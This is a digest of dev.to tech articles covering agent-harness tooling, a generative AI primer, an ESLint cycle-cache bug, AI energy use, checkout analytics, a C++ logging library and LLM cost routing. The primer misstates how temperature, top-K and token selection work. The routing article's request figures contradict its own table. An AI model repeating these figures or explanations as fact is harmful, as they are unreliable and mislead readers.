His ideas were complicated, but “most of the arguments are very straightforward once you set things up,” Litt said. “You just keep going and going and going. He found us the highway.”

---
## 2026 Q1 is the year developers still build the agent harness. 2026 Q3 / 2027 is the year the LLM builds its own harness.

> Published: 2026-05-24 03:12:16+00:00
> Source: https://dev.to/programming_withjackche/2026-q1-is-the-year-developers-still-build-the-agent-harness-2026-q3-2027-is-the-year-the-llm-359f
> wpnews: https://wpnews.pro/news/2026-q1-is-the-year-developers-still-build-the-agent-harness-2026-q3-2027-is-the

According to the article, the "agent harness" refers to the essential context files (such as AGENTS.md, CLAUDE.md, and rule sets) that AI coding agents require before they can work effectively on a project. The author predicts that while developers will still need to manually create this harness in early 2026, by late 2026 or 2027, large language models will be capable of automatically generating their own project-specific harness. To bridge this gap, the author created "harnessforge," an open-source tool that locally inspects a repository and generates the necessary startup files for various AI coding agents.

2026 Q1 is the year developers still build the agent harness.
2026 Q3 / 2027 is the year the LLM builds its own harness.
Today, every AI coding agent — Claude Code, Cursor, Codex, Gemini CLI, Aider, you name it — depends on the same hidden layer:
the files that brief the agent before it starts work.
AGENTS.md
CLAUDE.md
.cursor/rules
SKILLS/
MCP server lists
memory schemas
test commands
lint commands
“Do not touch these paths.”
“Require human approval before this.”
Different IDE, same boilerplate.
Different repo, same boilerplate.
Different agent, same boilerplate.
That is the agent harness problem.
Most people talk about the coding agent itself.
But in practice, the quality of an AI coding session often depends on the context layer around the agent.
Before the agent starts coding, it needs to know:
Without this layer, even strong coding agents can make subtle mistakes.
With this layer, the same agent can behave much more consistently.
That layer is what I call the harness.
In theory, the LLM should be able to inspect a repo and generate all of this itself.
In practice, we are not fully there yet.
The models are smart enough to do real coding work, but not always reliable enough to deterministically generate perfect project-specific ground truth from scratch on every fresh repo, every time.
They can do it sometimes.
Not always.
So the human stays in the loop.
We write the same repo instructions again.
We copy the same rules across projects.
We maintain separate files for Claude Code, Cursor, Codex-style agents, Continue, Windsurf, and others.
Small work per repo.
Painful in aggregate.
I think this is temporary.
Soon, the coding model should be able to:
At that point, the harness layer disappears as a separately authored artifact.
But until then, developers still need a bridge.
I built harnessforge
to test this idea.
It is a local, open-source harness generator for AI coding agents.
It is not another coding agent.
Your coding agent stays the brain.
harnessforge
just lays down the ground truth the agent reads before work begins.
Run:
uvx harnessforge init
or install:
pip install harnessforge
In a few seconds, fully local with no network calls by default, it inspects your repo and generates startup files commonly used by AI coding agents.
Depending on the project and blueprint, harnessforge
can generate files such as:
AGENTS.md
SOUL.md
TOOLS.md
MEMORY.md
SKILLS/
.claude/CLAUDE.md
.cursor/rules
.continue/
.windsurf/rules
blueprint-specific validators
The goal is simple:
give the coding agent a stronger starting point.
The current version includes these blueprints:
rag-agent
For retrieval systems, knowledge-base agents, citation enforcement, and grounded responses.
finance-agent
For finance or stock-related agents, including market-data handling and validation rules around trade execution safety.
support-agent
For customer support flows such as intent detection, knowledge-base lookup, ticket creation, escalation, and ticket lineage.
workflow-agent
For multi-step orchestration with tool logs, idempotency, and validation structure.
python-cli-app
A default blueprint for greenfield Python CLI projects.
The important idea is not the specific files.
The important idea is that coding agents need a reliable project-specific operating context.
Today, we manually maintain that context.
Tomorrow, the model may generate it automatically.
harnessforge
is meant to sit in the middle.
A bridge, not a moat.
Use it now.
Throw it away when the models catch up.
uvx harnessforge init
Then open Claude Code, Cursor, Codex, Gemini CLI, Aider, or another coding agent inside the repo.
The agent now has project-specific context files to read before it starts work.
Instead of starting from a blank repo, the agent starts with:
The coding agent still writes the code.
The harness just gives it the right context.
My bet is:
2026 Q1: developers still build the agent harness.
2026 Q3 / 2027: the LLM builds its own harness.
Until that happens, a local deterministic harness generator can make AI coding workflows more reliable.
GitHub:
https://github.com/jcaiagent7143-ui/harnessforge
PyPI:
https://pypi.org/project/harnessforge/
I would love feedback from developers using Claude Code, Cursor, Codex, Gemini CLI, Aider, Continue, Windsurf, or other coding agents in real repos.
How are you managing your agent harness today?
Are you manually maintaining AGENTS.md
, CLAUDE.md
, .cursor/rules
, MCP configs, memory files, and validation rules?
Or do you think the next generation of coding models will generate this layer automatically?

---
## Introduction to Generative AI

> Published: 2026-05-24 03:11:43+00:00
> Source: https://dev.to/indumathi__r/introduction-to-generative-ai-6in
> wpnews: https://wpnews.pro/news/introduction-to-generative-ai

Generative AI creates content like text, images, or video based on user input using a mathematical model trained on vast amounts of multimodal data. A common type is the large language model (LLM), which predicts the next word by assigning probability scores to possible outputs and selecting the highest-scoring one. Output generation can be controlled by adjusting parameters like temperature (factual vs. imaginative), Top-K (number of token candidates), and Top-P (cumulative probability threshold).

What is Generative AI ?
For the given user input(user query), output like text,image, video etc will be generated. This is called generative AI.
How it generates content?
A model will be used to generate output. i.e model will receive input and based on that, it will generate a output.
What is a model?
At its core, model is nothing but a mathematical equation.It will be multidimensional. vast amount of multimodal data (text,audio,video, image etc) would be subjected to training to get the required mathematical equation. To get the desired state, backpropagation will be carried out.
120b model means, equation has, 120 billion parameters. One of the commonly used model type in generative ai is LLM.
What is LLM ?
LLM stand for large language model. LLM basically predict the next word. If i provide the input query as hello to gpt model, based on the data it was trained, it will predict and returns the next word. In my case i got Hello,How can I help you today?
Response will not be generated and sent all at once. It will be generated one by one and sent in a streamed manner(by means of SSE event).
How it predicts the next word?
In the above example, when i gave hello as input, why "Hi, how can i help you today was returned" ? not hi or world etc .
For the given input, model provides some of possibility words like
hi, world, howdy, how may i help you etc. For each possible word, it gives a score(most occuring probability). Word which is having highest score will be returned as output. If the scores are hi (0.2), world(0.4), howdy(0.1), how may i help you(0.7), highest score is 0.7, so "how may i help you is returned".
Can we tweak the model to control how output should be?
This can be achieved by tweaking the following parameters
1. Temperature
2. Top- K
3. Top - P
Temperature
Temperature controls whether the output generated be factual or imaginative. Temperature value lies between 0 - 1. If it is closer to zero, then it more of a factual and the value is closer to 1, then it is more of a imaginative.
Example prompt for low temperature
Example prompt for high temperature
2.Top -K
K denotes the number of tokens to be returned. For the prompt, The cat sat on the ---- following words are predicted for the varying values of k.
3.Top - P
Threshold percentage will be set. From the set of predicted words, those words will be taken whose cumulative probability score approximates to threshold percentage.
For the prompt, The cat and top_p = 0.7

---
## no-cycle finds 0 cycles in next.js (and other lies caches tell you)

> Published: 2026-05-24 03:07:43+00:00
> Source: https://dev.to/ofri-peretz/no-cycle-finds-0-cycles-in-nextjs-and-other-lies-caches-tell-you-3ld8
> wpnews: https://wpnews.pro/news/no-cycle-finds-0-cycles-in-next-js-and-other-lies-caches-tell-you

The article describes a bug in a cycle-detection algorithm used in an ESLint plugin for Next.js, where a depth limit in the DFS search caused files to be incorrectly cached as "acyclic" when the search was truncated before finding a cycle. This caching bug cascaded across thousands of files, causing the tool to report zero cycles in a large codebase (14,556 files) while smaller scopes and a different tool (oxlint) correctly found 17 cycles. The fix involves tracking whether the DFS was truncated by the depth limit and only caching files as acyclic when the search fully completes without finding a cycle.

We benchmark `import-next/no-cycle`

against `eslint-plugin-import/no-cycle`

and oxlint's native Rust port on next.js (131K stars, 14,556 source files). The two ESLint plugins agreed: **0 cycles found**. oxlint disagreed: **17 cycles found**.

We trusted the consensus. Then we tested our own rule on a 33-file subset of the same repo (`packages/next/src/client/components/router-reducer/**`

). It found **5+ cycles immediately**.

Same rule. Same config. Same files. Different scope. Different answers.

The bug was 60 lines deep in the cache layer — and it explains why the wider scope returned silence.

## The setup that hides the bug

Every cycle-detection algorithm has the same shape:

- For each file F in the lint scope
- Run a depth-bounded DFS over its import graph
- If DFS returns to F → found a cycle
- Else → F is acyclic, remember that for next time

Step 4 is where caching pays off. With N files and average graph depth D, naive cycle detection is O(N²·D). With a "known acyclic" cache, repeat visits are O(1). On real codebases the cache hit rate is 70%+ — without it the rule gets too slow to run in CI.

The shape of the cache:

```
interface FileSystemCache {
  // ...
  nonCyclicFiles: Set<string>; // files known not to be in any cycle
}
```

And the use site:

```
function dfs(file: string, depth: number, visited: Set<string>) {
  if (file === sourceFile) {
    allCycles.push([...pathStack, file]);
    return;
  }
  if (depth >= maxDepth) return; // <-- early return on depth limit
  if (visited.has(file)) return;
  if (cache.nonCyclicFiles.has(file)) return;
  // ... recurse into imports
}

dfs(targetFile, 1, new Set());
if (allCycles.length === 0) {
  cache.nonCyclicFiles.add(targetFile); // <-- cache the result
}
```

Spot the bug? It's between those two `// <--`

lines.

## Why the cache poisons itself

When the DFS hits `depth >= maxDepth`

, it returns *as if it had completed exploration without finding a cycle*. The caller can't tell the difference between "I explored everything and found nothing" and "I gave up at depth 10."

So a file whose only cycle is at depth 12 (where 12 > maxDepth=10) gets:

- DFS truncated at depth 10
`allCycles.length === 0`

-
— incorrectly marked as known-acyclic`cache.nonCyclicFiles.add(targetFile)`

Now any future DFS that traverses through that file short-circuits because of `if (cache.nonCyclicFiles.has(file)) return;`

. The poisoning cascades: every file in the same SCC subtree gets marked acyclic by association.

In a small lint scope, you don't see the cascade — there aren't enough files for one bad cache entry to mask the others. In a 14K-file scope, one early miss-then-cache wipes out the whole cluster.

## The narrow-vs-wide scope smoking gun

Here's the test that proved it. Same rule, same config, same `--no-cache`

flag (so ESLint doesn't cache between runs — but our in-process cache is still active for the duration of the run):

``` bash
# Wide scope: 2,363 files, includes everything in packages/
$ eslint --config flagship.config.mjs 'packages/**/*.{ts,tsx,js}'
# 0 import-next/no-cycle findings

# Narrow scope: 33 files, just the router-reducer directory
$ eslint --config flagship.config.mjs 'packages/next/src/client/components/router-reducer/**/*.ts'
# 5+ import-next/no-cycle findings
```

The narrow run finds cycles. The wide run, run from a fresh process with a fresh cache, also produces a fresh cache — but ESLint linits files in some order, and as it processes the 2,363 files, it builds up the `nonCyclicFiles`

cache. By the time the lint pass reaches files that *do* belong to cycles, those cycles have been falsely marked acyclic via cascade.

oxlint, being a different process with its own implementation, doesn't share our cache. It uses oxlint's own `ModuleGraphVisitorBuilder`

and finds 17 cycles.

## The fix

Track whether the DFS was truncated, and don't cache truncated runs:

``` js
let depthLimitHit = false;

function dfs(file: string, depth: number, visited: Set<string>) {
  if (file === sourceFile) {
    allCycles.push([...pathStack, file]);
    return;
  }
  if (depth >= maxDepth) {
    depthLimitHit = true; // <-- record the truncation
    return;
  }
  // ... rest unchanged
}

dfs(targetFile, 1, new Set());

// Only cache as acyclic when DFS COMPLETED and found nothing.
// A depth-truncated DFS isn't proof of acyclicity.
if (allCycles.length === 0 && !depthLimitHit) {
  cache.nonCyclicFiles.add(targetFile);
}
```

Five lines. Re-running on next.js: **0 → 245 unique files in cycles, 914 unique (file, line) pairs**. The wide-scope correctness now matches the narrow-scope correctness.

## What `eslint-plugin-import`

does instead

When you've found a real bug, it's worth checking how peers in the same landscape modeled the problem. The long-standing `eslint-plugin-import/no-cycle`

rule uses a fundamentally different approach:

``` js
// from eslint-plugin-import/src/rules/no-cycle.js:73
const scc = options.disableScc
  ? {}
  : StronglyConnectedComponentsBuilder.get(myPath, context);

// ...

// If we're in different SCCs, we can't have a circular dependency
const hasDependencyCycle =
  options.disableScc || scc[myPath] === scc[imported.path];
if (!hasDependencyCycle) return;
```

They build a strongly-connected-components graph **once per lint run**, then per-file the cycle check is O(1) — *"are these two files in the same SCC?"*. The SCC graph itself is computed in O(V+E) using Tarjan's algorithm.

This sidesteps the depth-limit problem entirely. SCCs are an exact answer to "what are the cycle clusters?" — there's no truncation, no approximation, no cache to poison. They cache the SCC result module-wide and clear it on `Program:exit`

.

oxlint goes further: it builds an explicit module graph during parsing, then the cycle visitor runs against that graph directly. No need for SCC because the graph is already structured.

Both approaches share a property our DFS-with-cache approach lacks: **the algorithm is exact, not approximate**. The cache trades some compute for correctness — exactly what we accidentally did the wrong way.

## What I'd do differently next time

Three takeaways from the diagnosis:

**Caches should never lie.** A cache entry should only encode information you've *proven*, not information you've *failed to disprove*. Our `nonCyclicFiles`

cache encoded "DFS found no cycle" as "no cycle exists." Those aren't the same statement.

**Test the algorithm at the same scope you'll deploy at.** Our unit tests passed because the test fixtures are small and depth-bounded. The bug only surfaces at 2K+ files where the cache fills up enough for cascades to start. We need a stress test that mirrors production.

**An exact algorithm sidesteps a class of bugs that caches can introduce.** SCC-based cycle detection (eslint-plugin-import) and module-graph walking (oxlint) avoid the depth-limit interaction by construction. We hold our DFS approach for a reason — incremental analysis benefits from per-file caching — but the depth-limit + cache interaction is exactly the kind of bug the SCC approach can't have. Worth re-evaluating whether incrementality is worth that trade.

The fix is in [packages/eslint-devkit/src/resolver/dependency-analysis.ts](https://github.com/ofri-peretz/eslint/blob/main/packages/eslint-devkit/src/resolver/dependency-analysis.ts). The bench that exposed it is [ benchmarks/suites/ilb-flagship](https://github.com/ofri-peretz/eslint/tree/main/benchmarks/suites/ilb-flagship).

This is one of three rule bugs caught by the same bench sweep. The companion writeups: [What ground truth caught that unit tests missed](https://ofriperetz.dev/articles/what-ground-truth-caught-that-unit-tests-missed) (the smoke-gate piece) and [When entropy isn't enough](https://ofriperetz.dev/articles/no-hardcoded-credentials-entropy-isnt-enough) (807 false credential findings on vercel/ai).

## 📊 About the author

I'm Ofri Peretz, building the Interlace ESLint ecosystem — a JavaScript static-analysis catalog that runs under ESLint and Oxlint with CI-enforced parity.

---
## Google I/O 2026 Wasn’t About AI Models — It Was About Infrastructure

> Published: 2026-05-24 03:02:49+00:00
> Source: https://dev.to/surfiniaburger/google-io-2026-wasnt-about-ai-models-it-was-about-infrastructure-53me
> wpnews: https://wpnews.pro/news/google-i-o-2026-wasnt-about-ai-models-it-was-about-infrastructure

According to the article, Google I/O 2026 focused less on AI models and more on the massive physical infrastructure required to run them, highlighting the immense energy and water consumption behind AI processing. The author notes that the event revealed how intelligence is becoming infrastructure, with every prompt carrying a physical cost, such as enough energy to power nearly 3 million light bulbs for a year. The article concludes that the defining tradeoff of this era will be balancing AI's productivity gains against the real-world costs of sustaining its physical consumption.

This is a submission for the Google I/O Writing Challenge
I actually appointed myself as AGI Police some days back. On account of the number of times I've found myself sipping AI slop milkshake.
As a reformed individual (with regulated slop intake), I keep listening to Yann LeCun's insights through several notable podcasts. He constantly reminds us that “LLMs in general cannot predict the consequences of their actions.”
Google I/O 2026 made an impact, with lots of exciting announcements. Training across the largest clusters in the world. Over 7x more tokens processed every month. Bigger infrastructure. Faster inference. More intelligence delivered instantly to billions of people.
But somewhere in the middle of all the demos and applause, I found myself thinking less about the models and more about the machinery underneath them.
So I asked Google AI Mode to help calculate the energy consumption behind large-scale token processing and compare it to something human-sized.
Here is what we found out in less than 30 seconds of processing.
We could power nearly 3 million light bulbs continuously, 24 hours a day, for an entire year. Let that sink in.
What struck me wasn’t just the raw number itself. It was the inversion of intuition.
AI feels weightless.
You type words into a chat box and receive intelligence back in seconds. No smoke. No factory floor. No visible machinery. Just text appearing instantly on a glowing rectangle in your hand.
But underneath that interface sits an industrial system consuming electricity, water, cooling infrastructure, and global semiconductor supply chains at unprecedented scale.
Before I looked away, Gemini made another suggestion that made me even more curious. It suggested comparing the energy consumption with Nvidia infrastructure and also estimating the amount of water required to cool the servers powering the inference workloads.
I indulged.
And in less than 5 seconds (which means I was exaggerating when I said 30 seconds earlier), this happened:
457 million litres matches the total annual water footprint of roughly 1,200 average household families.
At that point, the conversation stopped feeling like a fun experiment and started feeling like a glimpse into the physical economics of intelligence itself.
The real takeaway from Google I/O wasn’t simply that models are getting smarter.
It was that intelligence is becoming infrastructure.
Every prompt now has a physical cost attached to it:
And the strange part is that users rarely see any of it.
What fascinated me most was how Gemini framed the answers. Instead of treating the numbers like an alarming revelation, it immediately contextualized them against broader industry infrastructure. The response was technically useful, but it also revealed something subtle about AI systems: they do not merely answer questions; they shape how scale is emotionally interpreted.
The answer, although accurate, still felt slightly biased — almost like the system instinctively softened the psychological impact of the numbers by normalizing them within the broader AI race.
And honestly, I understand why.
Because the benefit of knowledge being delivered at our fingertips is genuinely incredible.
A student can learn quantum mechanics from a village with weak infrastructure. A founder can prototype an idea in hours instead of months. A developer can debug systems faster than ever before. The productivity gains are real.
But so is the cost.
For years, software scaled mostly through abstraction. AI may be the first mainstream computing paradigm where scaling intelligence also means scaling physical consumption in the real world.
That may ultimately become the defining tradeoff of this era.
The question after Google I/O is no longer just:
“How intelligent can these systems become?”
But also:
“What will it cost to sustain them?”

---
## Hermes Agent vs Openclaw

> Published: 2026-05-24 02:58:43+00:00
> Source: https://dev.to/wanjohichristopher/hermes-vs-openclaw-2j4d
> wpnews: https://wpnews.pro/news/hermes-agent-vs-openclaw

In 2026, Hermes and OpenClaw are the two most-starred open-source AI agent frameworks on GitHub. A comparison article by WanjohiChristopher analyzes their features, performance, and community support to help developers choose between them.

Hermes vs OpenClaw: The Two Most-Starred AI Agent Frameworks of 2026

              WanjohiChristopher
            

              
                WanjohiChristopher
                
              
              

WanjohiChristopher

                    
                      Follow
                    
                  

May 22

          Hermes vs OpenClaw: The Two Most-Starred AI Agent Frameworks of 2026
        

#
ai

#
agents

#
opensource

#
comparison

1
 reaction

              Comments

              
Add Comment

            6 min read

---
## Your Checkout Is Probably Leaking Revenue. The Problem Is You Cannot See Where.

> Published: 2026-05-24 02:57:46+00:00
> Source: https://dev.to/xiden001/your-checkout-is-probably-leaking-revenue-the-problem-is-you-cannot-see-where-26kh
> wpnews: https://wpnews.pro/news/your-checkout-is-probably-leaking-revenue-the-problem-is-you-cannot-see-where

Based solely on the provided text, the article explains that most ecommerce teams know when checkout conversion drops but not why, as standard analytics only show where users leave, not the specific reasons for their hesitation or abandonment. It argues that checkout is a complex interaction surface where small technical issues like field errors or slow widgets create costly friction, and that teams need a diagnostic layer to identify these specific problems. The author introduces a tool called Checkout Friction Detector, which monitors behavioral patterns like dead clicks and validation failures to provide actionable alerts without recording user sessions.

Most ecommerce teams know when checkout conversion is down.
Very few know why.
That gap is expensive.
You can have strong traffic, good product pages, healthy add-to-cart rates, and a polished brand experience, then still lose a meaningful percentage of buyers during the final few steps.
The worst part is that the usual analytics stack often tells you only that people dropped off, not what made them hesitate, rage click, retry a field, abandon a step, or give up completely.
For business owners, this is a revenue problem.
For engineers, this is an observability problem.
And for ecommerce teams, it is one of the most overlooked places where small technical issues quietly become real commercial losses.
It is easy to think of checkout as a simple sequence:
In reality, checkout is a dense interaction surface.
Every field, button, validation rule, third-party widget, browser autofill behavior, payment provider, shipping condition, discount code, and loading state can affect whether the customer completes the purchase.
A buyer may abandon because:
None of these issues necessarily look dramatic in a dashboard.
But they add up.
A checkout does not need to be broken to lose money. It only needs to create enough friction for a motivated buyer to pause, doubt, or leave.
Most ecommerce teams already have some analytics installed.
They can usually answer questions like:
Those are useful questions, but they are not enough.
Knowing that users dropped off between shipping and payment does not tell you whether they struggled with the postal code field, got stuck on shipping rates, rage-clicked a disabled continue button, or abandoned after a payment widget failed to load.
Traditional analytics often gives you the map.
What teams need is the diagnostic layer.
That means understanding the actual interaction signals inside checkout:
This is the difference between observing a funnel and understanding user friction.
Session replay tools can be helpful. I have used them. Many teams do.
But they also introduce a practical problem: someone has to watch the recordings.
That does not scale well.
For an ecommerce founder, watching dozens of sessions is not a good use of time.
For a CRO specialist, it can become a noisy manual review process.
For engineers, it often lacks the structured event data needed to reproduce and prioritize issues efficiently.
There is also the privacy angle. Many brands, especially those selling in Europe or handling sensitive customer flows, are cautious about recording user sessions. Even when tools mask input values, the perception and compliance burden can still be a concern.
Checkout needs something more focused.
Not another dashboard.
Not hundreds of recordings.
Not vague aggregate metrics.
It needs a direct signal:
This field caused unusual hesitation.
This button received dead clicks.
This step saw repeated validation failures.
This checkout path started showing abnormal abandonment.
That is the layer I wanted to build.
I built Checkout Friction Detector to help ecommerce teams identify the specific checkout interactions that may be costing them sales.
The idea is simple:
Install one script tag, then receive alerts and reports about checkout friction without recording sessions or collecting personal customer data.
The tool monitors behavioral friction patterns such as:
Instead of asking teams to dig through dashboards or watch recordings, it sends practical summaries that highlight where users are struggling.
For business teams, the value is clarity.
For technical teams, the value is signal.
If you own or operate an ecommerce business, your checkout is one of the highest-leverage parts of your revenue system.
You may already be spending money on:
All of that effort is designed to bring people closer to purchase.
But if checkout creates preventable friction, your acquisition budget is subsidizing lost revenue.
That is what makes checkout optimization so powerful. You are not trying to create demand from scratch. You are improving the path for people who already showed buying intent.
A small checkout improvement can have an outsized impact because it applies near the bottom of the funnel.
The closer a customer is to purchase, the more expensive it is to lose them.
For engineers, checkout friction is often difficult because the symptoms are distributed across frontend behavior, backend validation, third-party services, browser differences, device constraints, and business rules.
A checkout issue might come from:
The support ticket usually says something vague:
“Some customers are having trouble checking out.”
That is not enough.
Engineers need better context:
Checkout Friction Detector is designed to expose those signals in a way that is useful for debugging and prioritization.
It does not replace logs, analytics, or error monitoring. It complements them by focusing on user-facing friction inside the checkout experience.
Many checkout issues are not hard failures.
A hard failure is obvious. Payment fails. The page crashes. An API returns an error. A user cannot proceed.
Friction is more subtle.
A user may technically be able to complete checkout, but the experience makes them work too hard.
That is why friction often hides in plain sight.
For example:
None of these necessarily crash the app.
But they can still cost conversions.
This is where interaction-level monitoring becomes valuable.
Checkout is sensitive.
Customers are entering addresses, contact details, payment information, and personal buying intent. That means any analytics tool used in checkout should be careful by design.
My approach with Checkout Friction Detector is simple:
For example, the system does not need to know what a customer typed into a field.
It only needs to know that a field caused repeated edits, hesitation, validation failure, or abandonment.
That distinction matters.
You can learn that a checkout field is causing friction without storing the customer’s private input.
If you are building or optimizing an ecommerce checkout, these are the signals I would pay attention to.
How long do users pause before completing a field?
High hesitation may indicate confusion, poor labeling, unfamiliar requirements, or anxiety about why the information is needed.
This is especially important for fields like:
When users keep changing the same field, something may be unclear.
Repeated edits can point to:
Validation is necessary, but poor validation kills momentum.
Track which fields produce the most errors, when those errors appear, and whether users recover after seeing them.
A validation error that users recover from quickly may be acceptable.
A validation error that leads to abandonment is a serious conversion risk.
Rage clicks usually indicate frustration.
In checkout, they often happen when:
Dead clicks happen when users click elements that do not respond.
This can reveal misleading UI, broken event handlers, confusing design, or missing feedback.
Dead clicks are especially useful because they show where user expectation and product behavior diverge.
Step-level abandonment is not new, but it becomes more useful when combined with interaction data.
Knowing users abandon at the shipping step is useful.
Knowing they abandon at the shipping step after repeated postal code validation failures is actionable.
Imagine your checkout completion rate drops by 8% over two weeks.
Your analytics show that the biggest drop-off is happening between shipping and payment.
That is helpful, but still too broad.
Now imagine you also know:
That is no longer just a conversion issue.
That is a clear investigation path.
A business owner sees the revenue risk.
An engineer sees where to inspect.
A CRO specialist sees what to test.
That is the kind of bridge checkout analytics should create.
The biggest insight for me was that ecommerce checkout problems sit at the intersection of business, UX, and engineering.
They are rarely owned by one function.
Marketing drives the traffic.
Design shapes the experience.
Engineering builds the flow.
Operations define shipping and payment rules.
Support hears the complaints.
Leadership sees the revenue impact.
But the actual friction often lives between all of those teams.
That is why visibility matters.
When checkout issues are vague, teams debate opinions.
When friction is measurable, teams can prioritize.
Checkout Friction Detector is built for:
It is especially useful for teams that want practical checkout insights without adding another heavy analytics dashboard or relying on session recordings.
Ecommerce teams have spent years improving traffic acquisition.
Better ads. Better targeting. Better landing pages. Better email flows. Better personalization.
But the checkout experience is still where intent either turns into revenue or disappears.
That final step deserves better observability.
Not just conversion rates.
Not just recordings.
Not just dashboards.
Actual friction signals.
The kind that tell you where customers are struggling, what changed, and what needs attention.
That is what I am building with Checkout Friction Detector.
The goal is straightforward:
Help ecommerce teams find and fix the checkout friction that quietly costs them sales.
You can check it out here:

---
## Domain-Based C++ Logging With Nova

> Published: 2026-05-24 02:54:53+00:00
> Source: https://dev.to/kleetus_mactavish/domain-based-c-logging-with-nova-o77
> wpnews: https://wpnews.pro/news/domain-based-c-logging-with-nova

Nova is a new C++ logging library that uses compile-time types for logging domains instead of runtime string identifiers or global severity levels, enabling independent per-subsystem configuration and routing. The library includes Flare, an async-signal-safe crash logging component that writes structured records to disk without heap allocation or locks. Benchmarks show Nova performs competitively across realistic workloads, particularly in scenarios requiring deterministic behavior and bounded memory usage.

Repository: https://github.com/kmac-13/nova/
Benchmarks: https://github.com/kmac-13/nova/blob/main/docs/BENCHMARKS.md
I am pleased to announce the initial release of Nova - a modern C++ logging library focused on deterministic behavior, compile-time configurability, and flexible domain-based routing for systems ranging from hosted platforms down to bare-metal and safety-critical environments.
There are already several quality C++ logging libraries available. However, most logging libraries organize routing and filtering around severity levels and rely on global logger configuration or runtime string-based logging categories. Engineers are often forced to encode subsystem behavior into a limited set of severity levels while also considering which thresholds will be enabled in production. This also leads to situations where enabling debug logging for one subsystem effectively requires enabling debug logging across unrelated areas of the application.
Nova instead treats logging domains as compile-time types, allowing logging configuration and routing to directly reflect application structure rather than forcing subsystems into global severity categories.
Domains can represent subsystems, modules, interfaces, classes, libraries, or any other domain-specific concept, and each domain can be independently enabled, disabled, or routed without reliance on shared global configuration. Because domains are independent types rather than shared string identifiers, libraries can define their own logging domains without interfering with application or third-party logging configuration.
Additional goals of the library include:
Nova also includes Flare, an async-signal-safe crash and forensic logging component that writes structured diagnostic records directly to disk from signal handlers - without heap allocation, locks, or non-signal-safe C++ runtime features.
#include <nova.h>
// define a domain (can be any type)
struct MotionPlanner {};
// configure the domain with a name (MOTION), enabled state (true), and clock type (steadyNanosecs)
NOVA_LOGGER_TRAITS( MotionPlanner, MOTION, true, kmac::nova::TimestampHelper::steadyNanosecs );
int main()
{
// configure motion planner sink as mpSink
...
// bind the mpSink to the MotionPlanner logging domain
kmac::nova::ScopedConfigurator config;
config.bind< MotionPlanner >( &mpSink );
// log
NOVA_LOG( MotionPlanner ) << "Planning trajectory...";
}
Here we can see that the MotionPlanner
domain is defined, the traits for the domain are configured, a target sink is bound to the domain, and logging is performed. In this example, the domain is a simple, empty struct, but a domain can be any type, including interface, abstract, or concrete classes. A domain can even be a specific class, and logging can be limited to the scope of that class.
Using types as logging domains enables compile-time routing, strong subsystem separation, and per-domain configuration and enablement. Disabled domains can be eliminated entirely by the compiler, and type names prevent the silent runtime failures that string-based routing can introduce.
Additionally, per-domain control means that enabling verbose logging for one subsystem has no effect on any other - there is no shared severity threshold to raise or lower across the entire application just to see detailed output from a single area.
Nova has been benchmarked against several popular C++ logging libraries, including Quill and spdlog, using:
The benchmarks intentionally normalize queue sizing and backend threading models to avoid structurally advantaging any particular library configuration.
Results varied by workload, but several patterns consistently emerged:
While Nova does not always achieve the highest theoretical front-end enqueue rate, it performed extremely competitively across a broad range of realistic workloads, especially where deterministic behavior and bounded memory usage are important.
Full benchmark methodology and raw benchmark data are available in the repository.
The initial release is now available at the repository linked above. I am still actively working on improving the library with additional features such as:
I would appreciate feedback on any aspects of Nova (e.g. integration experience, cross-platform/compiler issues, feature requests). If you try Nova in a project, I’d love to hear how it performs and where it can improve.
Thanks for reading.

---
## OpenCode Go + Oh My OpenAgent: The Model Routing Config That Actually Saves Money

> Published: 2026-05-24 02:53:03+00:00
> Source: https://dev.to/devansh365/opencode-go-oh-my-openagent-the-model-routing-config-that-actually-saves-money-3jmj
> wpnews: https://wpnews.pro/news/opencode-go-oh-my-openagent-the-model-routing-config-that-actually-saves-money

The article explains that OpenCode Go's usage limits are based on dollar amounts ($12 per 5-hour window) rather than request counts, making model routing critical because different models offer vastly different request volumes for the same cost. It highlights that DeepSeek V4 Flash provides approximately 36 times more requests than GLM-5.1 for the same $12 budget, and recommends assigning specific models to tasks based on complexity to optimize spending. The piece also describes Oh My OpenAgent's three-layer architecture (Planning, Orchestration, and Execution) and notes that multi-agent workflows can consume 30-50 requests per complex task, quickly exhausting the budget if expensive models are used unnecessarily.

Most guides on OpenCode Go start with the models. I want to start with the thing most guides get wrong: the limits are denominated in dollars, not requests.

That sounds like a minor distinction. It isn't.

## The thing everyone misses

OpenCode Go costs $5 for the first month, then $10/month. Your usage cap is $12 per 5-hour window, $30/week, $60/month.

When you spend $12 in a 5-hour window on DeepSeek V4 Flash, you get approximately 31,650 requests. When you spend the same $12 on GLM-5.1, you get around 880. Same budget. 36x difference in volume.

This is why routing actually matters. If you pick one model and use it for everything, you are either burning premium requests on tasks that don't need them, or you are under-using cheap models that are surprisingly capable. The right move is assigning models to tasks based on what each task actually requires.

MiniMax M2.5 has a hard cap of 100,000 requests per month regardless of cost. It activates only ~10B parameters and is priced at 16.7x cheaper than Claude Opus 4.6 on input tokens. For high-volume low-complexity work, it is the obvious choice, and most people don't know it exists.

## What you lose running on a single premium model

Say you put everything through DeepSeek V4 Pro: 10,200 requests per 5-hour window. That sounds fine for light use. But Oh My OpenAgent runs multiple agents in parallel. Prometheus decomposes your task, Metis synthesizes context, Atlas manages sequencing, Sisyphus runs execution, and the Librarian reads docs. A single complex task can fan out into 30-50 requests without you doing anything. Your 5-hour budget evaporates in a few hours of active work.

The problem isn't the quality gap. V4 Pro at 80.6% is within 7 percentage points of Claude Opus 4.7 at 87.6%, and for most routine tickets that gap is invisible. The problem is you don't need that quality for every step of a multi-agent workflow.

## The tier breakdown with actual numbers

Here is what the available models score on benchmarks that matter for coding tasks, plus the API pricing that drives the routing math:

| Model | SWE-Bench Verified | Input price (per M tokens) | Requests/5hrs ($12) | Context |
|---|---|---|---|---|
| Claude Opus 4.7 | 87.6% | $5.00 | ~480 | 200K tokens |
| DeepSeek V4 Pro | 80.6% | $0.435 (promo, ends May 31) | ~5,500 | 1M tokens |
| Kimi K2.6 | 80.2% | $0.95 | ~2,500 | 256K tokens |
| Claude Sonnet 4.6 | 79.6% | $3.00 | ~800 | 200K tokens |
| MiMo-V2.5-Pro | 78.9% | ~$0.40 | ~6,000 | — |
| Qwen3.6 Plus | 78.8% | $0.325 | ~7,400 | 1M tokens |
| DeepSeek V4 Flash | ~79.0% | $0.14 | ~17,000 | 1M tokens |
| GLM-5.1 | SWE-Bench Pro 58.4% | ~$1.50 | ~1,600 | 200K tokens |
| Qwen3.5 Plus | — | $0.08 | ~30,000 | — |
